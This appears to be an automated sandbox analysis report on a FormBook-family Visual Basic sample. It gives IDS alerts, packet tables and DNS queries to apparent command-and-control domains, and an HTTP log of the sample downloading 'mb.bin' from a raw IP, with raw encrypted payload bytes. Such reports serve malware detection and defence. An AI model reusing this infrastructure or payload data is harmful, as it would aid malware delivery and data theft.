                                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                Version Infos

                                                DescriptionData
                                                Translation0x0804 0x04b0
                                                LegalCopyrightInternal Verify Number,88
                                                InternalNameStoveddrif
                                                FileVersion1.00
                                                CompanyNameInternal Verify Number,88
                                                LegalTrademarksInternal Verify Number,88
                                                ProductNameANTERIADGRIZZ
                                                ProductVersion1.00
                                                OriginalFilenameStoveddrif.exe

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                ChineseChina

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                02/25/21-15:34:16.437721TCP2018752ET TROJAN Generic .bin download from Dotted Quad4971680192.168.2.545.153.203.33
                                                02/25/21-15:34:59.716490TCP1201ATTACK-RESPONSES 403 Forbidden804972123.227.38.74192.168.2.5
                                                02/25/21-15:35:04.845968TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.845968TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.845968TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                02/25/21-15:35:04.985802TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5
                                                02/25/21-15:35:40.123188ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                                02/25/21-15:35:41.133951ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 15:34:16.374516964 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.436796904 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.436944962 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.437721014 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496598005 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496635914 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496656895 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496682882 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496690989 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496706009 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496721983 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496727943 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496752024 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496774912 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496777058 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496798038 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496805906 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496819973 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.496850014 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.496882915 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552798986 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552834988 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552855968 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552880049 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552896976 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552903891 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552927971 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552930117 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552949905 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552973986 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.552982092 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.552997112 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553010941 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553019047 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553040028 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553060055 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553078890 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553090096 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553102970 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553114891 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553126097 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553150892 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553150892 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553174973 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553178072 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553200960 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553211927 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553224087 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553255081 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553303957 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553766966 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553790092 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.553852081 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.553875923 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608613968 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608660936 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608685970 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608709097 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608732939 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608740091 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608757019 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608778954 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608799934 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608803988 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608824015 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608850956 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608874083 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608882904 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608896971 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608913898 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.608923912 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608949900 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608968019 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608983040 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.608999014 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609016895 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609028101 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609044075 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609066963 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609091043 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609117031 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609138966 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609163046 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609183073 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609195948 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609220028 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609230995 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609244108 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609266996 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609278917 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609289885 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609313965 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609323978 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609338045 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609360933 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609400988 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609406948 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609431982 CET804971645.153.203.33192.168.2.5
                                                Feb 25, 2021 15:34:16.609442949 CET4971680192.168.2.545.153.203.33
                                                Feb 25, 2021 15:34:16.609456062 CET804971645.153.203.33192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Feb 25, 2021 15:33:46.760808945 CET5430253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:46.809546947 CET53543028.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:46.944928885 CET5378453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:46.993603945 CET53537848.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:47.278341055 CET6530753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:47.329859018 CET53653078.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:47.430898905 CET6434453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:47.480560064 CET53643448.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:48.598409891 CET6206053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:48.647420883 CET53620608.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:49.453242064 CET6180553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:49.501979113 CET53618058.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:50.042534113 CET5479553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:50.111465931 CET53547958.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:50.840801954 CET4955753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:50.889533997 CET53495578.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:51.791261911 CET6173353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:51.839999914 CET53617338.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:53.128864050 CET6544753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:53.179744959 CET53654478.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:54.904480934 CET5244153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:54.956171989 CET53524418.8.8.8192.168.2.5
                                                Feb 25, 2021 15:33:59.180936098 CET6217653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:33:59.238554955 CET53621768.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:00.270656109 CET5959653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:00.319485903 CET53595968.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:02.033029079 CET6529653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:02.081828117 CET53652968.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:03.337635994 CET6318353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:03.386605978 CET53631838.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:05.278891087 CET6015153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:05.327903986 CET53601518.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:15.828790903 CET5696953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:15.888827085 CET53569698.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:26.380974054 CET5516153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:26.430370092 CET53551618.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:41.504708052 CET5475753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:41.564961910 CET53547578.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:41.824915886 CET4999253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:41.873536110 CET53499928.8.8.8192.168.2.5
                                                Feb 25, 2021 15:34:59.387612104 CET6007553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:34:59.467755079 CET53600758.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:00.532416105 CET5501653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:00.590795040 CET53550168.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:04.727324963 CET6434553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:04.803482056 CET53643458.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:10.006350040 CET5712853192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:10.165909052 CET53571288.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:15.455497026 CET5479153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:15.520267010 CET53547918.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:20.651760101 CET5046353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:20.721322060 CET53504638.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:25.823204994 CET5039453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:25.916791916 CET53503948.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:30.873569012 CET5853053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:30.922476053 CET53585308.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:31.067783117 CET5381353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:31.290615082 CET53538138.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:37.013619900 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:38.006710052 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:39.022430897 CET6373253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:39.119537115 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:40.121794939 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:41.133748055 CET53637328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:44.136579037 CET5734453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:44.193861961 CET53573448.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:49.397527933 CET5445053192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:49.461996078 CET53544508.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:51.366041899 CET5926153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:51.446662903 CET53592618.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:52.313885927 CET5715153192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:52.377159119 CET53571518.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:52.943109989 CET5941353192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.003117085 CET53594138.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:53.415678978 CET6051653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.488059044 CET53605168.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:53.489516973 CET5164953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:53.592928886 CET53516498.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:54.130358934 CET6508653192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:54.190591097 CET53650868.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:54.873523951 CET5643253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:54.954210043 CET53564328.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:55.668181896 CET5292953192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:55.725471020 CET53529298.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:56.585637093 CET6431753192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:56.645855904 CET53643178.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:57.545361996 CET6100453192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:57.597060919 CET53610048.8.8.8192.168.2.5
                                                Feb 25, 2021 15:35:58.037137985 CET5689553192.168.2.58.8.8.8
                                                Feb 25, 2021 15:35:58.094475031 CET53568958.8.8.8192.168.2.5
                                                Feb 25, 2021 15:36:11.851654053 CET6237253192.168.2.58.8.8.8
                                                Feb 25, 2021 15:36:11.925832987 CET53623728.8.8.8192.168.2.5

                                                ICMP Packets

                                                TimestampSource IPDest IPChecksumCodeType
                                                Feb 25, 2021 15:35:40.123188019 CET192.168.2.58.8.8.8cfff(Port unreachable)Destination Unreachable
                                                Feb 25, 2021 15:35:41.133950949 CET192.168.2.58.8.8.8cfff(Port unreachable)Destination Unreachable

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Feb 25, 2021 15:34:59.387612104 CET192.168.2.58.8.8.80x2dd7Standard query (0)www.buytgp.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:04.727324963 CET192.168.2.58.8.8.80x3337Standard query (0)www.delmarranch.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:10.006350040 CET192.168.2.58.8.8.80x4175Standard query (0)www.youridealworld.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:15.455497026 CET192.168.2.58.8.8.80x8107Standard query (0)www.apkiinsurance.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.651760101 CET192.168.2.58.8.8.80x1b27Standard query (0)www.bestcroissantinlondon.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:25.823204994 CET192.168.2.58.8.8.80x33feStandard query (0)www.thakehamwesthorsley.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:31.067783117 CET192.168.2.58.8.8.80xcd6cStandard query (0)www.guillemaudexcellenceauto.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:37.013619900 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:38.006710052 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:39.022430897 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:44.136579037 CET192.168.2.58.8.8.80xeb17Standard query (0)www.karatetheokinawaway.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:49.397527933 CET192.168.2.58.8.8.80x5be2Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:36:11.851654053 CET192.168.2.58.8.8.80x1886Standard query (0)www.qionglaizhan.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Feb 25, 2021 15:34:59.467755079 CET8.8.8.8192.168.2.50x2dd7No error (0)www.buytgp.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:34:59.467755079 CET8.8.8.8192.168.2.50x2dd7No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:04.803482056 CET8.8.8.8192.168.2.50x3337No error (0)www.delmarranch.comdelmarranch.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:04.803482056 CET8.8.8.8192.168.2.50x3337No error (0)delmarranch.com34.102.136.180A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:10.165909052 CET8.8.8.8192.168.2.50x4175No error (0)www.youridealworld.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:15.520267010 CET8.8.8.8192.168.2.50x8107No error (0)www.apkiinsurance.com104.21.56.93A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:15.520267010 CET8.8.8.8192.168.2.50x8107No error (0)www.apkiinsurance.com172.67.183.186A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)www.bestcroissantinlondon.combestcroissantinlondon.comCNAME (Canonical name)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)bestcroissantinlondon.com192.0.78.25A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:20.721322060 CET8.8.8.8192.168.2.50x1b27No error (0)bestcroissantinlondon.com192.0.78.24A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:25.916791916 CET8.8.8.8192.168.2.50x33feNo error (0)www.thakehamwesthorsley.com94.136.40.51A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:31.290615082 CET8.8.8.8192.168.2.50xcd6cNo error (0)www.guillemaudexcellenceauto.com146.148.189.216A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:39.119537115 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:40.121794939 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:41.133748055 CET8.8.8.8192.168.2.50x64eServer failure (2)www.scriptureonhealing.comnonenoneA (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:44.193861961 CET8.8.8.8192.168.2.50xeb17No error (0)www.karatetheokinawaway.com94.136.40.51A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:35:49.461996078 CET8.8.8.8192.168.2.50x5be2No error (0)www.qionglaizhan.com47.110.53.154A (IP address)IN (0x0001)
                                                Feb 25, 2021 15:36:11.925832987 CET8.8.8.8192.168.2.50x1886No error (0)www.qionglaizhan.com47.110.53.154A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • 45.153.203.33
                                                • www.buytgp.com
                                                • www.delmarranch.com
                                                • www.apkiinsurance.com
                                                • www.bestcroissantinlondon.com
                                                • www.thakehamwesthorsley.com
                                                • www.guillemaudexcellenceauto.com
                                                • www.karatetheokinawaway.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.54971645.153.203.3380C:\Users\user\Desktop\dwg.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:34:16.437721014 CET1150OUTGET /mb.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Host: 45.153.203.33
                                                Cache-Control: no-cache
                                                Feb 25, 2021 15:34:16.496598005 CET1151INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 25 Feb 2021 10:54:48 GMT
                                                Accept-Ranges: bytes
                                                ETag: "211feda264bd71:0"
                                                Server: Microsoft-IIS/10.0
                                                Date: Thu, 25 Feb 2021 14:34:16 GMT
                                                Content-Length: 164928
                                                Data Raw: a8 24 4b 82 f9 88 f9 c6 7d 04 10 aa 72 07 c5 63 43 e5 18 2e 43 2d 60 f8 bf 3c b3 20 cf 0a ca 10 37 8a d7 cd 8f ca 5e 1b 5c 5c f4 e4 0a 6f bf 86 a0 07 3d 78 77 98 da 38 7e c0 76 7b 5c f4 9c ae cd 00 90 37 c0 a5 0d b0 c3 4f 21 11 da 2f 61 53 72 d8 5a 68 e7 ee 3c 65 9d 33 bf d9 40 d6 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd 53 70 4d db 67 4a 4f 82 d5 5a ab e3 a8 4d 5d 65 5a 45 3d 77 65 74 d5 dd a2 e7 bd 37 60 d6 03 d8 aa c9 c0 02 bd 14 f5 87 4a e1 0f f4 6b 38 73 85 78 ef 7e 99 64 b1 69 a9 c2 8a 8d 23 9e ea 9c bd ad cc 6b 38 30 a4 07 9c 2c 4e 67 94 39 0d 79 ed 24 3d 11 d4 b5 84 00 e5 05 22 da c7 39 50 08 20 6d 05 42 68 f5 35 04 fe eb 44 f8 17 35 81 2a 60 1d ad d4 3c 3b ea c8 0e 19 14 9b 48 d0 b4 a9 48 87 24 03 0d 2d 1c dd 8a 5f f9 17 15 f8 8b b1 6b 51 da c2 af bc 9d 7b 79 b6 c8 bf fc e1 5c d6 75 1d 15 8e 2c ff 01 e4 ab fe 75 7e 9c 3e a8 c3 20 64 b7 8d 05 27 f4 5a d0 fb 87 d4 d5 f0 f7 b9 57 d0 a8 10 e3 0e bd d4 6d c3 53 fd 46 04 1b 3c 22 f7 4b d1 eb df 40 73 97 0f b4 f9 6d 82 7e 36 8a e8 3a 22 79 3c 51 5c de bf fe 20 b1 fe 1d 90 27 56 9b a9 f8 65 ea fa 9f 7b 0e 4d e2 63 06 43 dc 8b fe 04 ce 32 9a 27 6d aa 3b 25 bc 71 a2 46 51 80 ce 03 07 9d bd 89 3c 4b 79 93 a5 7e 3f a0 ee e8 38 75 1d e2 00 e3 56 5d 4d 54 dd 38 f6 bf 98 b8 1f c8 61 38 21 84 a4 58 31 39 5a 48 a0 83 17 d0 8e ce dc c0 80 d1 8b ef f4 3a 72 74 59 65 f1 a0 52 7b d9 5e b7 58 5b 2f 62 11 b0 b6 c6 ad ea d7 19 ec 79 43 d5 b4 b4 7d 11 60 d9 c7 a0 e3 c7 11 fc 14 b0 f6 84 43 c4 2c cd 00 7f 95 e9 11 ed 15 0d 5a aa 9d 0e 67 de 8b b4 31 a1 28 91 5c e8 74 e2 90 ef 99 5b f0 41 85 be d0 8d c7 d0 16 3a 43 c0 f6 59 66 bb d0 46 f8 79 9f f0 bc 97 1c bc b8 b4 61 32 6e 6a b5 6b cb d4 42 36 a4 f8 fc e4 34 88 ff f1 ad 97 3a df ef 14 29 22 a7 e3 d8 55 11 e6 26 f4 c5 5f d5 db 7a c2 eb 67 00 0a ae d9 5d 47 e6 d7 3b 43 5b dc 1e 7b 84 73 f4 49 1f 52 71 b9 c2 93 12 39 7f ce d5 7c 0c 69 00 14 01 c9 7c 30 96 24 a0 d8 e1 34 36 9a 38 94 e2 72 86 dd 74 16 e1 20 0e e9 f1 2d 93 46 9e ba 1f 6b 8b 9d 7f ea 84 c3 6d db 40 35 d8 18 c7 a0 d6 a9 f2 1f 5e 4a c0 89 c6 84 d2 88 a4 49 bb fa 1e 8e b4 ca 62 60 1d bb ee a3 3c 7b b8 ef 7a b6 80 99 d9 c4 48 b0 b2 a4 ff d0 9d ce 4b d4 84 1c 28 da 80 ba f2 11 0c 46 b8 d2 d2 43 cc 8a 2a 30 91 b9 c1 bf df c0 d1 2e 47 03 43 70 45 e2 72 e5 ef 6f 64 53 aa 35 86 64 e0 d5 e9 3b a5 0a bd f4 53 8b af 0b a6 dd 55 0e bb 2c 5d 00 ae c5 09 06 43 07 4f d0 03 63 69 05 d9 11 f6 76 2a d7 e3 a0 72 a7 c4 6f 23 7e a0 52 83 da 03 b3 2a dd d7 c7 2a f0 a5 b5 b6 79 eb fd d2 80 5a d5 65 28 a5 0d b0 c3 17 a2 f9 d3 a4 a9 d0 b2 e4 d1 68 e4 2f bf a5 b5 30 b7 26 a1 46 5c 0d 17 e1 36 4a 69 c8 4f 27 75 46 93 a5 8f ea 72 c8 de 7b b4 f8 d3 e4 85 2f cd 16 cb cd eb 70 4d db 69 55 f5 8c d5 ee a2 2e 89 f5 5c 29 97 64 69 1f 0c 07 f5 ad d0 88 da 45 01 bb 23 bb cb a7 ae 6d c9 34 97 e2 6a 93 7a 9a 4b 51 1d a5 3c a0 2d b9 09 de 0d cc ec 87 80 29 